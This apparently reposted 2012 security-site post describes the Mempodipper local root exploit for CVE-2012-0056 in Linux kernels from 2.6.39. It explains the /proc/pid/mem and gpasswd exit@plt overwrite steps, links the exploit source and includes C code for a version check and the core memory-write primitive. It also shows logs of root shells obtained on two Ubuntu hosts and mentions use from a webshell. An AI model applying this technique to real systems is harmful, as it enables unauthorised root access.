Linux kernels >= 2.6.39 local root exploit 0day - vulnerability warning - myhack58 (黑吧安全网)

2012-01-25T00:00:00
ID MYHACK58:62201232980
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-01-25T00:00:00

Description

This is absolutely awesome: every kernel from 2.6.39 onward has this vulnerability (CVE-2012-0056, a write through /proc/pid/mem; the fix landed in Linux 3.2.2, so mainline 2.6.39 through 3.2.1 are affected unless a distribution has backported the patch). Original source: http://blog.zx2c4.com/749. The exploit code can be found here: http://www.dis9.com/code/mempodipper-CVE-2012-0056.c.html.
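A quick triage helper for the version claim above, added here as an example (it is not part of the original post and not part of the exploit): it parses a uname -r release string and reports whether it lies in the mainline range affected by CVE-2012-0056, taken as 2.6.39 up to but not including 3.2.2, the release that carries the fix. The cut-off, the parser and the function names are the example's own assumptions. Stable-series and distribution backports are not modelled, so a vendor kernel may be patched at a lower version number, or vulnerable at one this check does not flag; treat the answer as a prompt to verify against the vendor advisory, not as proof either way.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/utsname.h>

struct kver { int major, minor, patch; };

/* Parse the leading "N.N[.N]" of a release string such as "3.0.0-12-generic"
 * or "2.6.39.4"; whatever follows the numbers (the distro suffix, a fourth
 * component) is ignored. Returns 0 on success, -1 if there is no "N.N". */
static int parse_kver(const char *s, struct kver *v)
{
    long parts[3] = {0, 0, 0};
    char *end;
    int i;
    for (i = 0; i < 3; i++) {
        if (*s < '0' || *s > '9') break;
        parts[i] = strtol(s, &end, 10);
        s = end;
        if (*s != '.') { i++; break; }
        s++;
    }
    if (i < 2) return -1;
    v->major = (int)parts[0]; v->minor = (int)parts[1]; v->patch = (int)parts[2];
    return 0;
}

/* Three-way comparison of kernel versions. */
static int kver_cmp(const struct kver *a, const struct kver *b)
{
    if (a->major != b->major) return a->major < b->major ? -1 : 1;
    if (a->minor != b->minor) return a->minor < b->minor ? -1 : 1;
    if (a->patch != b->patch) return a->patch < b->patch ? -1 : 1;
    return 0;
}

/* 1 = inside the mainline range affected by CVE-2012-0056, 0 = outside it,
 * -1 = release string not parseable. Assumption (example's own): the range
 * is [2.6.39, 3.2.2); backports on either side are invisible to this check. */
int cve_2012_0056_mainline_range(const char *release)
{
    static const struct kver first_bad = {2, 6, 39}; /* writes to /proc/pid/mem enabled */
    static const struct kver fixed = {3, 2, 2};      /* release carrying the fix */
    struct kver v;
    if (parse_kver(release, &v) < 0) return -1;
    return kver_cmp(&v, &first_bad) >= 0 && kver_cmp(&v, &fixed) < 0;
}

int main(void)
{
    struct utsname u;
    if (uname(&u) != 0) { perror("uname"); return 1; }
    int r = cve_2012_0056_mainline_range(u.release);
    printf("%s: %s\n", u.release,
           r == 1 ? "in the mainline affected range; confirm against the vendor advisory"
         : r == 0 ? "outside the mainline affected range (backports not considered)"
                  : "could not parse the release string");
    return 0;
}
```

Compile with gcc -Wall and run it on the host under test. For the two kernels used later on this page, 2.6.39.4 and 3.0.0-12-generic, it reports the affected range; for a current kernel it reports outside the range.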

The exploit abuses writes to /proc/pid/mem. /proc is a virtual file system: it occupies no disk space, reflects the live state of the running system, and is the kernel's interface for exposing its data structures. /proc/pid/mem is a read/write window onto the memory of process pid, and the file offset is the virtual address, so a write at offset 0x8049760 lands at that address inside the target. Writes to it were compiled out until 2.6.39 enabled them behind two checks, and the exploit satisfies both without any trick the kernel can see. Opening the file needs nothing beyond ordinary file permission (it is owner read/write, so any process with the same uid can open it), and the kernel records the opener's exec counter in the open file. Writing through it requires the writer to be the target process itself (or a process tracing it) and its exec counter to equal the recorded one. So the exploit forks; the child re-executes itself once to advance its counter, opens /proc/<parent pid>/mem, and sends the descriptor back to the parent over a socketpair with SCM_RIGHTS. The parent dup2()s the received descriptor onto stderr, reads the setuid gpasswd binary to locate exit@plt, seeks the descriptor to that address minus the padding it computes for gpasswd's error-message prefix, and execs gpasswd with shellcode in its argument; that exec advances the parent's counter to match the child's. gpasswd, now running as root, writes an error message that echoes its argument to stderr, and stderr is its own memory: the shellcode overwrites the exit@plt entry and runs as root as soon as gpasswd calls exit(). The fix in Linux 3.2.2 moves the permission check to open time (the opener must be allowed to ptrace the target) and pins the address space that was open, so a descriptor opened before an exec can no longer reach the post-exec image. The usage is very clever; the original post explains it well. Here is a test run.
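The mechanism above reduced to its unprivileged core, as an added example (this is not code from the original post and not zx2c4's mempodipper): a forked child opens /proc/<parent pid>/mem, passes the descriptor back over a socketpair with SCM_RIGHTS, and the parent then writes into its own address space through a descriptor it never opened, using the virtual address as the file offset. There is no setuid target, no exec and no shellcode, so it demonstrates the primitive only and also runs on fixed kernels, where a cross-process open is still allowed when the opener could ptrace the target at open time. It assumes Linux with /proc mounted, and it calls prctl(PR_SET_PTRACER, child) so that a host with Yama ptrace_scope=1 still lets the child open the parent's mem file; the marker variable, the function names and the error codes are the example's own.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/wait.h>

/* Example's own target: rewritten only via a descriptor the child opened. */
static volatile char g_marker[16] = "before";

/* Send one descriptor over a UNIX socket with SCM_RIGHTS; 0 on success. */
static int send_fd(int sock, int fd)
{
    char dummy = 'F', ctrl[CMSG_SPACE(sizeof(int))];
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = ctrl, .msg_controllen = sizeof ctrl };
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type = SCM_RIGHTS;
    c->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive a descriptor sent by send_fd(); returns the new local fd or -1. */
static int recv_fd(int sock)
{
    int fd;
    char dummy, ctrl[CMSG_SPACE(sizeof(int))];
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1,
                          .msg_control = ctrl, .msg_controllen = sizeof ctrl };
    if (recvmsg(sock, &msg, 0) != 1) return -1;
    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    if (!c || c->cmsg_level != SOL_SOCKET || c->cmsg_type != SCM_RIGHTS) return -1;
    memcpy(&fd, CMSG_DATA(c), sizeof(int));
    return fd;
}

/* Child: wait for the go-ahead byte (sent once the parent has named us as its
 * ptracer), open the parent's mem file, ship the descriptor back, exit. */
static void child_open_parent_mem(int sock)
{
    char go, path[64];
    if (read(sock, &go, 1) != 1) _exit(2);
    snprintf(path, sizeof path, "/proc/%d/mem", (int)getppid());
    int fd = open(path, O_RDWR);
    if (fd < 0) _exit(errno == EACCES || errno == EPERM ? 3 : 4); /* 3 = denied */
    _exit(send_fd(sock, fd) == 0 ? 0 : 5);
}

/* 1 = parent rewrote g_marker through the child-opened descriptor, 0 = write
 * accepted but memory unchanged, <0 = failing step (-10 - child exit code). */
int demo_cross_process_mem_write(void)
{
    int sv[2], memfd, status = 0;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) { close(sv[0]); child_open_parent_mem(sv[1]); _exit(6); }
    close(sv[1]);
    /* Fixed kernels check ptrace access at open time; name the child as our
     * ptracer so Yama ptrace_scope=1 still allows it. Ignored error without Yama. */
    prctl(PR_SET_PTRACER, (unsigned long)pid, 0, 0, 0);
    if (write(sv[0], "g", 1) != 1) return -3;
    memfd = recv_fd(sv[0]);
    waitpid(pid, &status, 0);
    close(sv[0]);
    if (memfd < 0) return WIFEXITED(status) ? -10 - WEXITSTATUS(status) : -4;
    /* The offset into /proc/<pid>/mem is the virtual address itself. */
    ssize_t n = pwrite(memfd, "after", 6, (off_t)(unsigned long)g_marker);
    close(memfd);
    if (n != 6) return -5;
    return strcmp((const char *)g_marker, "after") == 0;
}

/* The same helpers inside one process: needs neither /proc nor Yama. */
int fd_passing_roundtrip(void)
{
    int sv[2], in, out, ok;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return 0;
    in = open("/dev/null", O_RDONLY);
    if (in < 0 || send_fd(sv[0], in) < 0) return 0;
    out = recv_fd(sv[1]);
    ok = out >= 0 && out != in; /* a fresh descriptor, not the original number */
    if (out >= 0) close(out);
    close(in); close(sv[0]); close(sv[1]);
    return ok;
}

int main(void)
{
    int r = demo_cross_process_mem_write();
    printf("fd passing %d, cross-process write %d, marker \"%s\"\n",
           fd_passing_roundtrip(), r, (const char *)g_marker);
    return r == 1 ? 0 : 1;
}
```

Compile with gcc -Wall and run it; the marker should read "after". A result of -13 means the child was refused the open, which only happens on fixed kernels (vulnerable ones check nothing beyond file permission at open time) when Yama or an LSM denies the child ptrace access to its parent. Note that the exploit itself adds the piece this example leaves out: it execs the child once before the open and execs the setuid target after the dup2, so that the exec counters match at write time.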

I tested successfully on 2.6.39.4 and 3.0.0-12; the platforms are bt5r1 (Ubuntu 10.04) and Ubuntu 11.10 respectively.

ubuntu11.10:
left@left-T-6843c:~$ uname -a
Linux left-T-6843c 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
left@left-T-6843c:~$ id
uid=1000(left) gid=1000(left) groups=1000(left),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
left@left-T-6843c:~$ cd desktop
left@left-T-6843c:~/desktop$ gcc -o exploit exploit.c
left@left-T-6843c:~/desktop$ chmod +x exploit
left@left-T-6843c:~/desktop$ ./Trojan
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/3417/mem in the child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049770.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049760.
[+] Executing gpasswd with shellcode.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1000(left)

Test on bt5r1:
left@bt:~$ cd Desktop
left@bt:~/Desktop$ id
uid=1001(left) gid=1001(left) groups=1001(left)
left@bt:~/Desktop$ uname -a
Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
left@bt:~/Desktop$ chmod +x exploit
left@bt:~/Desktop$ ./Trojan
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1885/mem in child.
[+] Sending fd 5 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading gpasswd for exit@plt.
[+] Resolved exit@plt to 0x8049dc0.
[+] Calculating gpasswd padding.
[+] Seeking to offset 0x8049db0.
[+] Executing gpasswd with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=1001(left)

I also tested it from a webshell, and it succeeded there too. Very impressive.